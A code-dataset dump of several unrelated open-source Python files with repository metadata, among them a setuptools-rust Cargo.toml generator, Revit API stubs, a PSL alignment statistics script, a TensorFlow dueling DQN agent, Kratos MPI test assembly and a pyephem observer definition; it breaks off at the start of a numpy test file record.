7bdb81aadefec588d92f9e9d4b10bdc57ee6a2cb
| 8,935
|
py
|
Python
|
setuptools_rust/tomlgen.py
|
mtreinish/setuptools-rust
|
75fa9ab31351071a490b8d9c18826adf05ceb047
|
[
"MIT"
] | null | null | null |
setuptools_rust/tomlgen.py
|
mtreinish/setuptools-rust
|
75fa9ab31351071a490b8d9c18826adf05ceb047
|
[
"MIT"
] | null | null | null |
setuptools_rust/tomlgen.py
|
mtreinish/setuptools-rust
|
75fa9ab31351071a490b8d9c18826adf05ceb047
|
[
"MIT"
] | null | null | null |
# coding: utf-8
import glob
import os
import string
try:
import configparser
except ImportError:
import ConfigParser as configparser
import setuptools
from distutils import log
from distutils.command.build import build
from .extension import RustExtension
__all__ = ["tomlgen"]
class tomlgen_rust(setuptools.Command):
description = "Generate `Cargo.toml` for rust extensions"
user_options = [
(str("force"), str("f"), str("overwrite existing files if any")),
(
str("create-workspace"),
str("w"),
str("create a workspace file at the root of the project"),
),
(
str("no-config"),
str("C"),
str("do not create a `.cargo/config` file when generating a workspace"),
),
]
boolean_options = [str("create_workspace"), str("force")]
def initialize_options(self):
self.dependencies = None
self.authors = None
self.create_workspace = None
self.no_config = None
self.force = None
# use the build command to find build directories
self.build = build(self.distribution)
# parse config files
self.cfg = configparser.ConfigParser()
self.cfg.read(self.distribution.find_config_files())
def finalize_options(self):
# Finalize previous commands
self.distribution.finalize_options()
self.build.ensure_finalized()
# Shortcuts
self.extensions = self.distribution.rust_extensions
self.workspace = os.path.abspath(
os.path.dirname(self.distribution.script_name) or "."
)
# Build list of authors
if self.authors is not None:
sep = "\n" if "\n" in self.authors.strip() else ","
self.authors = [author.strip() for author in self.authors.split(sep)]
else:
self.authors = [
"{} <{}>".format(
self.distribution.get_author(),
self.distribution.get_author_email().strip("\"'"),
)
]
def run(self):
import toml
# Create a `Cargo.toml` for each extension
for ext in self.extensions:
if not os.path.exists(ext.path) or self.force:
log.info("creating 'Cargo.toml' for '%s'", ext.name)
with open(ext.path, "w") as manifest:
toml.dump(self.build_cargo_toml(ext), manifest)
else:
log.warn("skipping 'Cargo.toml' for '%s' -- already exists", ext.name)
# Create a `Cargo.toml` for the project workspace
if self.create_workspace and self.extensions:
toml_path = os.path.join(self.workspace, "Cargo.toml")
if not os.path.exists(toml_path) or self.force:
log.info("creating 'Cargo.toml' for workspace")
with open(toml_path, "w") as manifest:
toml.dump(self.build_workspace_toml(), manifest)
else:
log.warn("skipping 'Cargo.toml' for workspace -- already exists")
# Create a `.cargo/config` file
if self.create_workspace and self.extensions and not self.no_config:
dist = self.distribution
targetdir = os.path.join(self.build.build_temp, dist.get_name())
cfgdir = os.path.abspath(
os.path.join(os.getcwd(), dist.script_name, "..", ".cargo")
)
if not os.path.exists(os.path.join(cfgdir, "config")) or self.force:
if not os.path.exists(cfgdir):
os.makedirs(cfgdir)
with open(os.path.join(cfgdir, "config"), "w") as config:
log.info("creating '.cargo/config' for workspace")
toml.dump({
'build': {
'target-dir': os.path.relpath(targetdir)
},
}, config)
else:
log.warn("skipping '.cargo/config' -- already exists")
def build_cargo_toml(self, ext):
toml = {}
# The directory where the extension's manifest is located
tomldir = os.path.dirname(ext.path)
# If the RustExtension was not created by `find_rust_extensions`
# the `lib.rs` file is expected to be located near `Cargo.toml`
if not hasattr(ext, "libfile"):
ext.libfile = ext.path.replace("Cargo.toml", "lib.rs")
# Create a small package section
toml["package"] = {
"name": ext.name.replace('.', '-'),
"version": self.distribution.get_version(),
"authors": self.authors,
"publish": False,
"edition": "2018"
}
# Add the relative path to the workspace if any
if self.create_workspace:
toml["package"]["workspace"] = os.path.relpath(self.workspace, tomldir)
# Create a small lib section
toml["lib"] = {
"crate-type": ["cdylib"],
"name": _slugify(ext.name),
"path": os.path.relpath(ext.libfile, tomldir)
}
# Find dependencies within the `setup.cfg` file of the project
toml["dependencies"] = {}
for dep, options in self.iter_dependencies(ext):
toml["dependencies"][dep] = options
return toml
def build_workspace_toml(self):
# Find all members of the workspace
members = [
os.path.dirname(os.path.relpath(ext.path)) for ext in self.extensions
]
return {
"workspace": {
"members": members
}
}
def iter_dependencies(self, ext=None):
import toml
command = self.get_command_name()
# global dependencies
sections = ["{}.dependencies".format(command)]
# extension-specific dependencies
if ext is not None:
sections.append("{}.dependencies.{}".format(command, ext.name))
for section in sections:
if self.cfg.has_section(section):
for dep, options in self.cfg.items(section):
yield dep, toml.loads(f"{dep} = {options}")[dep]
def _slugify(name):
allowed = set(string.ascii_letters + string.digits + "_")
slug = [char if char in allowed else "_" for char in name]
return "".join(slug)
def find_rust_extensions(*directories, **kwargs):
"""Attempt to find Rust extensions in given directories.
    This function recurses through the given directories to find files
    whose name is ``libfile``. When such a file is found, an extension is
    created, expecting the cargo manifest file (``Cargo.toml``) to be next
    to that file. The extension's dotted name is deduced from the path of
    the directory that contains that ``libfile``.
Arguments:
directories (list, *optional*): a list of directories to walk
through recursively to find extensions. If none are given,
then the current directory will be used instead.
Keyword Arguments:
libfile (str): the name of the file to look for when searching
for Rust extensions. Defaults to ``lib.rs``, but might be
changed to allow defining more *Pythonic* filenames
(like ``__init__.rs``)!
Note:
All other keyword arguments will be directly passed to the
`RustExtension` instance created when an extension is found.
One may be interested in passing ``bindings`` and ``strip``
options::
>>> import setuptools_rust as rust
>>> rust.find_rust_extensions(binding=rust.Binding.PyO3)
Example:
Consider the following project::
lib/
└ mylib/
└ rustext/
├ lib.rs
├ ...
└ Cargo.toml
setup.py
There is only one extension that can be found in the ``lib``
module::
>>> import setuptools_rust as rust
>>> for ext in rust.find_rust_extensions("lib"):
... print(ext.name, "=>", ext.path)
lib.mylib.rustext => lib/mylib/rustext/Cargo.toml
"""
# Get the file used to mark a Rust extension
libfile = kwargs.get("libfile", "lib.rs")
# Get the directories to explore
directories = directories or [os.getcwd()]
extensions = []
for directory in directories:
for base, dirs, files in os.walk(directory):
if libfile in files:
dotpath = os.path.relpath(base).replace(os.path.sep, ".")
tomlpath = os.path.join(base, "Cargo.toml")
ext = RustExtension(dotpath, tomlpath, **kwargs)
ext.libfile = os.path.join(base, libfile)
extensions.append(ext)
return extensions
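# --- Hedged usage sketch (added; not part of the original module) ---
# A project might wire the helpers above into its setup.py roughly as follows.
# The layout ("lib" source directory, PyO3 binding) is only an assumption for
# illustration:
#
#     from setuptools import setup
#     from setuptools_rust import Binding
#     from setuptools_rust.tomlgen import find_rust_extensions, tomlgen_rust
#
#     setup(
#         name="myproject",
#         rust_extensions=find_rust_extensions("lib", binding=Binding.PyO3),
#         cmdclass={"tomlgen_rust": tomlgen_rust},
#         zip_safe=False,
#     )
#
# after which `python setup.py tomlgen_rust -w` would generate one Cargo.toml
# per extension plus a workspace manifest at the project root.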
| 33.339552
| 86
| 0.573027
|
981dd83788630c5a1d578cafcb636622776c8a08
| 4,630
|
py
|
Python
|
release/stubs.min/Autodesk/Revit/DB/__init___parts/ElementTransformUtils.py
|
YKato521/ironpython-stubs
|
b1f7c580de48528490b3ee5791b04898be95a9ae
|
[
"MIT"
] | null | null | null |
release/stubs.min/Autodesk/Revit/DB/__init___parts/ElementTransformUtils.py
|
YKato521/ironpython-stubs
|
b1f7c580de48528490b3ee5791b04898be95a9ae
|
[
"MIT"
] | null | null | null |
release/stubs.min/Autodesk/Revit/DB/__init___parts/ElementTransformUtils.py
|
YKato521/ironpython-stubs
|
b1f7c580de48528490b3ee5791b04898be95a9ae
|
[
"MIT"
] | null | null | null |
class ElementTransformUtils(object):
""" A collection of utilities allowing transformation of elements (e.g. move,rotate,mirror and copy). """
@staticmethod
def CanMirrorElement(ADoc, elemId):
"""
CanMirrorElement(ADoc: Document,elemId: ElementId) -> bool
Determines whether element can be mirrored.
ADoc: The document where the element reside.
elemId: The element identified by id.
Returns: True if the element can be mirrored.
"""
pass
@staticmethod
def CanMirrorElements(ADoc, elemIds):
""" CanMirrorElements(ADoc: Document,elemIds: ICollection[ElementId]) -> bool """
pass
@staticmethod
def CopyElement(document, elementToCopy, translation):
"""
CopyElement(document: Document,elementToCopy: ElementId,translation: XYZ) -> ICollection[ElementId]
Copies an element and places the copy at a location indicated by a given
transformation.
document: The document that owns the element.
elementToCopy: The id of the element to copy.
translation: The translation vector for the new element.
Returns: The ids of the newly created copied elements. More than one element may be
created due to dependencies.
"""
pass
@staticmethod
def CopyElements(*__args):
"""
CopyElements(document: Document,elementsToCopy: ICollection[ElementId],translation: XYZ) -> ICollection[ElementId]
CopyElements(sourceDocument: Document,elementsToCopy: ICollection[ElementId],destinationDocument: Document,transform: Transform,options: CopyPasteOptions) -> ICollection[ElementId]
CopyElements(sourceView: View,elementsToCopy: ICollection[ElementId],destinationView: View,additionalTransform: Transform,options: CopyPasteOptions) -> ICollection[ElementId]
"""
pass
@staticmethod
def GetTransformFromViewToView(sourceView, destinationView):
"""
GetTransformFromViewToView(sourceView: View,destinationView: View) -> Transform
Returns a transformation that is applied to elements when copying from one view
to another view.
sourceView: The source view
destinationView: The destination view
Returns: The transformation from source view to destination view.
"""
pass
@staticmethod
def MirrorElement(document, elementToMirror, plane):
"""
MirrorElement(document: Document,elementToMirror: ElementId,plane: Plane)
Creates a mirrored copy of an element about a given plane.
document: The document that owns the element.
elementToMirror: The element to mirror.
plane: The mirror plane.
"""
pass
@staticmethod
def MirrorElements(document, elementsToMirror, plane, mirrorCopies):
""" MirrorElements(document: Document,elementsToMirror: ICollection[ElementId],plane: Plane,mirrorCopies: bool) -> IList[ElementId] """
pass
@staticmethod
def MoveElement(document, elementToMove, translation):
"""
MoveElement(document: Document,elementToMove: ElementId,translation: XYZ)
Moves one element by a given transformation.
document: The document that owns the elements.
elementToMove: The id of the element to move.
translation: The translation vector for the elements.
"""
pass
@staticmethod
def MoveElements(document, elementsToMove, translation):
""" MoveElements(document: Document,elementsToMove: ICollection[ElementId],translation: XYZ) """
pass
@staticmethod
def RotateElement(document, elementToRotate, axis, angle):
"""
RotateElement(document: Document,elementToRotate: ElementId,axis: Line,angle: float)
Rotates an element about the given axis and angle.
document: The document that owns the elements.
elementToRotate: The element to rotate.
axis: The axis of rotation.
angle: The angle of rotation in radians.
"""
pass
@staticmethod
def RotateElements(document, elementsToRotate, axis, angle):
""" RotateElements(document: Document,elementsToRotate: ICollection[ElementId],axis: Line,angle: float) """
pass
__all__ = [
"CanMirrorElement",
"CanMirrorElements",
"CopyElement",
"CopyElements",
"GetTransformFromViewToView",
"MirrorElement",
"MirrorElements",
"MoveElement",
"MoveElements",
"RotateElement",
"RotateElements",
]
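# --- Hedged usage sketch (added; not part of the generated stub) ---
# Inside a running Revit session these utilities are called as static methods
# within a transaction; `doc` and `element_id` below are placeholders, and the
# snippet only works in the Revit API environment (e.g. pyRevit/IronPython):
#
#     from Autodesk.Revit.DB import Transaction, XYZ
#     t = Transaction(doc, "Move element")
#     t.Start()
#     ElementTransformUtils.MoveElement(doc, element_id, XYZ(10.0, 0.0, 0.0))
#     t.Commit()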
| 27.235294
| 183
| 0.674298
|
612f08c8586d9a658409baaf37c70d38e9776028
| 7,530
|
py
|
Python
|
scripts/psl2table.py
|
861934367/cgat
|
77fdc2f819320110ed56b5b61968468f73dfc5cb
|
[
"BSD-2-Clause",
"BSD-3-Clause"
] | null | null | null |
scripts/psl2table.py
|
861934367/cgat
|
77fdc2f819320110ed56b5b61968468f73dfc5cb
|
[
"BSD-2-Clause",
"BSD-3-Clause"
] | null | null | null |
scripts/psl2table.py
|
861934367/cgat
|
77fdc2f819320110ed56b5b61968468f73dfc5cb
|
[
"BSD-2-Clause",
"BSD-3-Clause"
] | 1
|
2019-08-04T22:46:38.000Z
|
2019-08-04T22:46:38.000Z
|
'''
psl2table.py - output stats for psl formatted alignments
================================================================
:Author: Andreas Heger
:Release: $Id$
:Date: |today|
:Tags: Python
Purpose
-------
.. todo::
describe purpose of the script.
Usage
-----
Example::
python psl2table.py --help
Type::
python psl2table.py --help
for command line help.
Command line options
--------------------
'''
import sys
import re
import CGAT.Experiment as E
import CGAT.Blat as Blat
import CGAT.SequenceProperties as SequenceProperties
import CGAT.SequencePairProperties as SequencePairProperties
import CGAT.WrapperCodeML as WrapperCodeML
USAGE = \
"""analyze sequence pairs from a psl formatted table.
The sequences are assumed to be nucleotide sequences.
Methods available are:
baseml: compute baseml rates
counts: compute residue counts (percent G+C, ...)
match: compute match statistics (pid, coverage)
"""
# ------------------------------------------------------------------------
class Counter:
def __init__(self, options):
pass
class CounterMatch(Counter):
def __init__(self, *args, **kwargs):
Counter.__init__(self, *args, **kwargs)
def __call__(self, match):
self.mPid = 100.0 * match.mNMatches / \
(match.mNMatches + match.mNMismatches)
self.mQueryCoverage = 100.0 * \
(match.mNMatches + match.mNMismatches) / match.mQueryLength
def __str__(self):
return "%6.4f\t%6.4f" % (self.mPid, self.mQueryCoverage)
def getHeaders(self):
return ["pid", "qCov"]
class QueriesCounter(SequenceProperties.SequencePropertiesNA):
def __init__(self, *args, **kwargs):
SequenceProperties.SequencePropertiesNA.__init__(self, *args, **kwargs)
def __call__(self, seq1, seq2):
SequenceProperties.SequencePropertiesNA.loadSequence(self, seq1)
class SbjctsCounter(SequenceProperties.SequencePropertiesNA):
def __init__(self, *args, **kwargs):
SequenceProperties.SequencePropertiesNA.__init__(self, *args, **kwargs)
def __call__(self, seq1, seq2):
SequenceProperties.SequencePropertiesNA.loadSequence(self, seq2)
# ------------------------------------------------------------------------
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
parser = E.OptionParser(version="%prog version: $Id: psl2table.py 2891 2010-04-07 08:59:18Z andreas $",
usage=globals()["__doc__"])
parser.add_option("--mask-lowercase", dest="mask_lowercase", action="store_true",
help="mask lowercase characters before computing properties [default=%default]")
parser.add_option("--with-match", dest="with_match", action="store_true",
help="echo the match in output [default=%default]")
parser.add_option("--without-match", dest="with_match", action="store_false",
help="do not echo the match in output [default=%default]")
parser.add_option("-m", "--method", dest="methods", type="choice", action="append",
choices=(
"counts", "baseml", "match", "query-counts", "sbjct-counts"),
help="methods to compute properties between sequence pairs.")
WrapperCodeML.BaseML().AddOptions(parser)
parser.set_defaults(
methods=[],
mask_lowercase=False,
is_pslx=True,
with_match=True,
)
(options, args) = E.Start(parser)
counters_plain = []
counters = []
for method in options.methods:
if method == "counts":
counters.append(
SequencePairProperties.SequencePairPropertiesCountsNa())
elif method == "query-counts":
counters.append(QueriesCounter())
elif method == "sbjct-counts":
counters.append(SbjctsCounter())
elif method == "baseml":
counters.append(
SequencePairProperties.SequencePairPropertiesBaseML(options))
elif method == "match":
counters_plain.append(CounterMatch(options))
if counters:
iterator = Blat.iterator_pslx(options.stdin)
header = "\t".join(Blat.MatchPSLX().getHeaders())
else:
iterator = Blat.iterator(options.stdin)
header = "\t".join(Blat.Match().getHeaders())
if not options.with_match:
header = "qName"
options.stdout.write("\t".join(
[header, ] +
["\t".join(x.getHeaders()) for x in counters] +
["\t".join(x.getHeaders()) for x in counters_plain]) + "\n")
ninput, noutput, nskipped = 0, 0, 0
# setup totals
# totals = {}
# for section in options.sections:
# if section == "length":
# s = SequencePropertiesLength()
# elif section == "na":
# s = SequencePropertiesNA()
# elif section == "aa":
# s = SequencePropertiesAA()
# elif section == "degeneracy":
# s = SequencePropertiesDegeneracy()
# elif section == "bias":
# s = SequencePropertiesBias( reference_codons )
# elif section == "codons":
# s = SequencePropertiesCodons()
# elif section == "codon-usage":
# s = SequencePropertiesCodonUsage()
# elif section == "codon-translator":
# s = SequencePropertiesCodonTranslator()
# else:
# raise "unknown section %s" % section
# totals[section] = s
for match in iterator:
ninput += 1
if options.with_match:
options.stdout.write(str(match))
else:
options.stdout.write(match.mQueryId)
if counters:
qseq = match.mQuerySequence
sseq = match.mSbjctSequence
# mask non printable characters - sometimes
# appear after using pslToPslX
qseq = [re.sub("[^a-zA-Z]", "N", x) for x in qseq]
sseq = [re.sub("[^a-zA-Z]", "N", x) for x in sseq]
if options.mask_lowercase:
qseq = [re.sub("[a-z]", "N", x) for x in qseq]
sseq = [re.sub("[a-z]", "N", x) for x in sseq]
match.mQuerySequence = qseq
match.mSbjctSequence = sseq
qseq = "".join(match.mQuerySequence).upper()
sseq = "".join(match.mSbjctSequence).upper()
if len(qseq) != len(sseq):
if options.loglevel >= 1:
options.stdlog.write(
"# WARNING: two sequences of unequal length in match\n# %s\n" % str(match))
nskipped += 1
continue
for counter in counters:
counter(qseq, sseq)
options.stdout.write("\t" +
"\t".join(
[str(counter) for counter in counters]))
if counters_plain:
for counter in counters_plain:
counter(match)
options.stdout.write("\t" +
"\t".join(
[str(counter) for counter in counters_plain]))
options.stdout.write("\n")
noutput += 1
if options.loglevel >= 1:
options.stdlog.write(
"# ninput=%i, noutput=%i, nskipped=%i\n" % (ninput, noutput, nskipped))
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
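# --- Hedged worked example (added; not part of the original script) ---
# CounterMatch above reports percent identity and query coverage as
#     pid  = 100 * matches / (matches + mismatches)
#     qCov = 100 * (matches + mismatches) / query_length
# so a match with 90 matches, 10 mismatches and a query of length 125 yields
#     pid  = 100 * 90 / 100  = 90.0
#     qCov = 100 * 100 / 125 = 80.0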
| 29.186047
| 107
| 0.566135
|
5888bddc279642a95b880fd6902f03f41aa1b105
| 5,793
|
py
|
Python
|
duelingDQN.py
|
957001934/Multi-Commander
|
20a3229a24040be95fadb02521d9a1f2f14e1888
|
[
"MIT"
] | 6
|
2019-08-03T04:04:34.000Z
|
2021-07-17T07:26:41.000Z
|
duelingDQN.py
|
957001934/Multi-Commander
|
20a3229a24040be95fadb02521d9a1f2f14e1888
|
[
"MIT"
] | null | null | null |
duelingDQN.py
|
957001934/Multi-Commander
|
20a3229a24040be95fadb02521d9a1f2f14e1888
|
[
"MIT"
] | null | null | null |
"""
Dueling DQN implementation using tensorflow
"""
import tensorflow as tf
import numpy as np
import random
from collections import deque
import copy
class DuelingDQNAgent(object):
def __init__(self, config):
self.state_size = config['state_size']
self.action_size = config['action_size']
self.memory = deque(maxlen=2000)
self.gamma = 0.95 # discount factor
self.epsilon = 1.0 # exploration rate
self.epsilon_min = 0.01
self.epsilon_decay = 0.995
self.learning_rate = 0.001
# self.update_target_freq =
self.batch_size = 32
self.qmodel = None
self.target_model = None
self.layer_size = {'shared':[20],
'V':[1],
'A':[20, self.action_size]}
self.global_step = 0
self.sess = tf.Session(config=tf.ConfigProto(device_count={'gpu':0}))
self.sess.__enter__()
self._build_model()
self.sess.run(tf.global_variables_initializer())
self.update_target_network()
        self.saver = tf.train.Saver()  # must be created after the initializer has run
intersection_id = list(config['lane_phase_info'].keys())[0]
self.phase_list = config['lane_phase_info'][intersection_id]['phase']
def _build_model(self):
self.state = tf.placeholder(tf.float32, [None, ] + [self.state_size], name='state')
self.state_ = tf.placeholder(tf.float32, [None, ] + [self.state_size], name='state_')
self.q_target = tf.placeholder(tf.float32, [None, ] + [self.action_size], name='q_target')
# with tf.variable_scope('qnet'):
# pass
# with tf.variable_scope('target'):
# pass
self.qmodel_output = self._build_network('qnet', self.state, self.layer_size)
        self.target_model_output = self._build_network('target', self.state_, self.layer_size)
# loss, and other operations
with tf.variable_scope('loss'):
self.q_loss = tf.reduce_mean(tf.squared_difference(self.qmodel_output, self.q_target))
with tf.variable_scope('train'):
self.train_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.q_loss)
        # op that overwrites the target network weights with the q network weights
        self.q_net_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='qnet')
        self.target_net_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='target')
        self.copy_target_op = [tf.assign(t, q) for t, q in zip(self.target_net_params, self.q_net_params)]
def _build_network(self, scope, state, layer_size):
with tf.variable_scope(scope):
with tf.variable_scope('shared'):
hidden = state
shared_layer_size = layer_size['shared']
for size in shared_layer_size:
hidden = tf.layers.dense(hidden, size,
bias_initializer=tf.constant_initializer(0.1),
kernel_initializer=tf.random_normal_initializer(0.1, 0.3))
hidden = tf.nn.relu(hidden)
with tf.variable_scope('Value'):
V = hidden
V_size = layer_size['V']
for size in V_size:
V = tf.layers.dense(V, size,
bias_initializer=tf.constant_initializer(0.1),
kernel_initializer=tf.random_normal_initializer(0.1, 0.3))
# no relu
with tf.variable_scope('Advantage'):
A = hidden
A_size = layer_size['A']
for size in A_size:
A = tf.layers.dense(A, size,
bias_initializer=tf.constant_initializer(0.1),
kernel_initializer=tf.random_normal_initializer(0.1, 0.3))
with tf.variable_scope('Q'):
out = V + (A - tf.reduce_mean(A, axis=1, keep_dims=True))
return out
def choose_action(self, state):
if np.random.rand() <= self.epsilon:
return random.randrange(self.action_size)
q_values = tf.get_default_session().run(self.qmodel_output, feed_dict={self.state: state})
return np.argmax(q_values[0])
def replay(self):
minibatch = random.sample(self.memory, self.batch_size)
states = []
q_target = []
for state, action, reward, next_state in minibatch:
states.append(state)
q_eval = tf.get_default_session().run(self.qmodel_output, feed_dict={self.state:state})
            q_next = tf.get_default_session().run(self.target_model_output, feed_dict={self.state_: next_state})
target_value = reward + self.gamma * np.max(q_next)
# q_target_ = copy.copy(q_eval)
q_target_ = q_eval.copy()
q_target_[0][action] = target_value
q_target.append(q_target_)
states = np.reshape(np.array(states), [-1, self.state_size])
q_target = np.reshape(np.array(q_target), [-1, self.action_size])
feed_dict = {self.state:states,
self.q_target:q_target}
# batch training
tf.get_default_session().run(self.train_op, feed_dict=feed_dict)
def update_target_network(self):
tf.get_default_session().run(self.copy_target_op)
def remember(self, state, action, reward, next_state):
action = self.phase_list.index(action)
self.memory.append((state, action, reward, next_state))
def save(self, ckpt, epoch):
self.saver.save(self.sess, ckpt, global_step=epoch)
print("model saved: {}-{}".format(ckpt, epoch))
def load(self, ckpt):
self.saver.restore(self.sess, ckpt)
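# --- Hedged illustrative sketch (added; not part of the original agent) ---
# The dueling head in _build_network combines the value and advantage streams as
#     Q(s, a) = V(s) + (A(s, a) - mean_a A(s, a))
# which keeps the V/A decomposition identifiable. A tiny numpy check of that
# aggregation, independent of TensorFlow and shown for illustration only:
if __name__ == "__main__":
    V = np.array([[2.0]])            # state value, shape (batch, 1)
    A = np.array([[1.0, 3.0, 2.0]])  # advantages, shape (batch, n_actions)
    Q = V + (A - A.mean(axis=1, keepdims=True))
    print(Q)                         # [[1. 3. 2.]] -- the mean advantage is removed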
| 38.62
| 107
| 0.587778
|
90864d9709d4b64fddc01d10d06eb3faa52ae0d7
| 52
|
py
|
Python
|
graphrepo/drillers/__init__.py
|
sofiapereiraGIT/GraphRepo
|
ee479f097615d33b87d2621498272d2d8de1471d
|
[
"Apache-2.0"
] | null | null | null |
graphrepo/drillers/__init__.py
|
sofiapereiraGIT/GraphRepo
|
ee479f097615d33b87d2621498272d2d8de1471d
|
[
"Apache-2.0"
] | null | null | null |
graphrepo/drillers/__init__.py
|
sofiapereiraGIT/GraphRepo
|
ee479f097615d33b87d2621498272d2d8de1471d
|
[
"Apache-2.0"
] | null | null | null |
from .driller import *
from .cache_driller import *
| 17.333333
| 28
| 0.769231
|
1d5842abdc41b081dcffbc393fa4887fae9749e2
| 377
|
py
|
Python
|
IMPACTA/Unid02_Sem6.py/exe_2.py
|
FR7/Meus-Projetos
|
1c8e1a91eaf143cccdc10f0e7edd013d910de474
|
[
"MIT"
] | null | null | null |
IMPACTA/Unid02_Sem6.py/exe_2.py
|
FR7/Meus-Projetos
|
1c8e1a91eaf143cccdc10f0e7edd013d910de474
|
[
"MIT"
] | null | null | null |
IMPACTA/Unid02_Sem6.py/exe_2.py
|
FR7/Meus-Projetos
|
1c8e1a91eaf143cccdc10f0e7edd013d910de474
|
[
"MIT"
] | null | null | null |
# The Fibonacci series is formed by the sequence 1, 1, 2, 3, 5, 8, 13, 21, 34, ... Write a program
# that prints the Fibonacci series up to the n-th term (n > 0).
n = int(input("Enter n to show the first n terms of the Fibonacci series: "))
a = 0
b = 1
for x in range(n):
    c = a
    a = b
    b = a + c
    print(a)
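# Hedged example of the expected behaviour (added): for n = 5 the loop above
# prints the first five terms of the series, one per line: 1 1 2 3 5.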
| 29
| 101
| 0.549072
|
cd593c432f1ccecbba367d8bdf0967564f12d185
| 2,011
|
py
|
Python
|
applications/FSIApplication/tests/test_mpi_FSIApplication.py
|
lcirrott/Kratos
|
8406e73e0ad214c4f89df4e75e9b29d0eb4a47ea
|
[
"BSD-4-Clause"
] | 2
|
2019-10-25T09:28:10.000Z
|
2019-11-21T12:51:46.000Z
|
applications/FSIApplication/tests/test_mpi_FSIApplication.py
|
lcirrott/Kratos
|
8406e73e0ad214c4f89df4e75e9b29d0eb4a47ea
|
[
"BSD-4-Clause"
] | 13
|
2019-10-07T12:06:51.000Z
|
2020-02-18T08:48:33.000Z
|
applications/FSIApplication/tests/test_mpi_FSIApplication.py
|
lcirrott/Kratos
|
8406e73e0ad214c4f89df4e75e9b29d0eb4a47ea
|
[
"BSD-4-Clause"
] | 1
|
2020-06-12T08:51:24.000Z
|
2020-06-12T08:51:24.000Z
|
# import Kratos
from KratosMultiphysics import *
from KratosMultiphysics.FSIApplication import *
# Import Kratos "wrapper" for unittests
import KratosMultiphysics.KratosUnittest as KratosUnittest
# Import the test classes to create the suites
## SMALL TESTS
from convergence_accelerator_spring_MPI_test import ConvergenceAcceleratorSpringMPITest
## NIGTHLY TESTS
## VALIDATION TESTS
def AssembleTestSuites():
    ''' Populates the test suites to run.
    At least, it should populate the suites:
    "small", "nightly" and "all".
    Return
    ------
    suites: A dictionary of suites
        The set of suites with their test_cases added.
    '''
suites = KratosUnittest.KratosSuites
### Small MPI tests ########################################################
smallMPISuite = suites['mpi_small']
smallMPISuite.addTest(ConvergenceAcceleratorSpringMPITest('test_aitken_accelerator_constant_forces'))
smallMPISuite.addTest(ConvergenceAcceleratorSpringMPITest('test_aitken_accelerator_variable_stiffness'))
smallMPISuite.addTest(ConvergenceAcceleratorSpringMPITest('test_aitken_accelerator_ghost_nodes'))
smallMPISuite.addTest(ConvergenceAcceleratorSpringMPITest('test_mvqn_recursive_accelerator_constant_forces'))
smallMPISuite.addTest(ConvergenceAcceleratorSpringMPITest('test_mvqn_recursive_accelerator_variable_stiffness'))
smallMPISuite.addTest(ConvergenceAcceleratorSpringMPITest('test_mvqn_recursive_accelerator_ghost_nodes'))
### Nightly MPI tests ######################################################
nightlyMPISuite = suites['mpi_nightly']
nightlyMPISuite.addTests(smallMPISuite)
### Full MPI set ###########################################################
allMPISuite = suites['mpi_all']
allMPISuite.addTests(nightlyMPISuite)
allSuite = suites['all']
allSuite.addTests(allMPISuite)
return suites
if __name__ == '__main__':
KratosUnittest.runTests( AssembleTestSuites() )
| 37.240741
| 116
| 0.719543
|
746d310d2457a1828d927b9980078063f37b4ec2
| 172
|
py
|
Python
|
fourpisky/sites/ami.py
|
4pisky/fourpisky-core
|
1dc9c4f73dfef075e2a27c3c8453d811a5a99e58
|
[
"BSD-2-Clause"
] | 2
|
2016-08-25T22:20:58.000Z
|
2018-11-18T21:16:11.000Z
|
fourpisky/sites/ami.py
|
4pisky/fourpisky-core
|
1dc9c4f73dfef075e2a27c3c8453d811a5a99e58
|
[
"BSD-2-Clause"
] | 2
|
2016-11-01T14:10:58.000Z
|
2016-11-01T14:11:39.000Z
|
fourpisky/sites/ami.py
|
4pisky/fourpisky-core
|
1dc9c4f73dfef075e2a27c3c8453d811a5a99e58
|
[
"BSD-2-Clause"
] | null | null | null |
import ephem
AmiLA = ephem.Observer()
AmiLA.lat = ephem.degrees('52.16977')
AmiLA.lon = ephem.degrees('0.059167')
AmiLA.horizon = ephem.degrees('20')
AmiLA.name = 'AMI-LA'
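# --- Hedged usage sketch (added; not part of the original module) ---
# With pyephem available, the observer above can be used to check whether a
# target is currently above AMI-LA's 20 degree elevation limit; the target
# (the Sun) and the use of the current time are arbitrary illustrative choices:
if __name__ == "__main__":
    AmiLA.date = ephem.now()
    sun = ephem.Sun()
    sun.compute(AmiLA)
    print("Sun altitude at AMI-LA:", sun.alt, "above horizon:", sun.alt > AmiLA.horizon)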
| 24.571429
| 37
| 0.715116
|
2281138ef695ae786ad3aa89a59b7e45d3f0f74d
| 899
|
py
|
Python
|
gui/api_plugins/output_plugin_test.py
|
pchaigno/grr
|
69c81624c281216a45c4bb88a9d4e4b0613a3556
|
[
"Apache-2.0"
] | 1
|
2015-01-07T05:29:57.000Z
|
2015-01-07T05:29:57.000Z
|
gui/api_plugins/output_plugin_test.py
|
pchaigno/grr
|
69c81624c281216a45c4bb88a9d4e4b0613a3556
|
[
"Apache-2.0"
] | null | null | null |
gui/api_plugins/output_plugin_test.py
|
pchaigno/grr
|
69c81624c281216a45c4bb88a9d4e4b0613a3556
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
"""This module contains tests for output plugins-related API renderers."""
from grr.gui import api_test_lib
from grr.lib import flags
from grr.lib import output_plugin
from grr.lib import test_lib
from grr.lib import utils
from grr.lib.output_plugins import csv_plugin
from grr.lib.output_plugins import email_plugin
class ApiOutputPluginsListRendererRegressionTest(
api_test_lib.ApiCallRendererRegressionTest):
"""Regression test for ApiOutputPluginsListRenderer."""
renderer = "ApiOutputPluginsListRenderer"
def Run(self):
with utils.Stubber(output_plugin.OutputPlugin, "classes", {
"EmailOutputPlugin": email_plugin.EmailOutputPlugin,
"CSVOutputPlugin": csv_plugin.CSVOutputPlugin
}):
self.Check("GET", "/api/output-plugins/all")
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
flags.StartMain(main)
| 25.685714
| 74
| 0.761958
|
4284861bd204069daecd42c8d56251205d65180f
| 38,486
|
py
|
Python
|
bin/Python27/Lib/site-packages/numpy/random/tests/test_random.py
|
lefevre-fraser/openmeta-mms
|
08f3115e76498df1f8d70641d71f5c52cab4ce5f
|
[
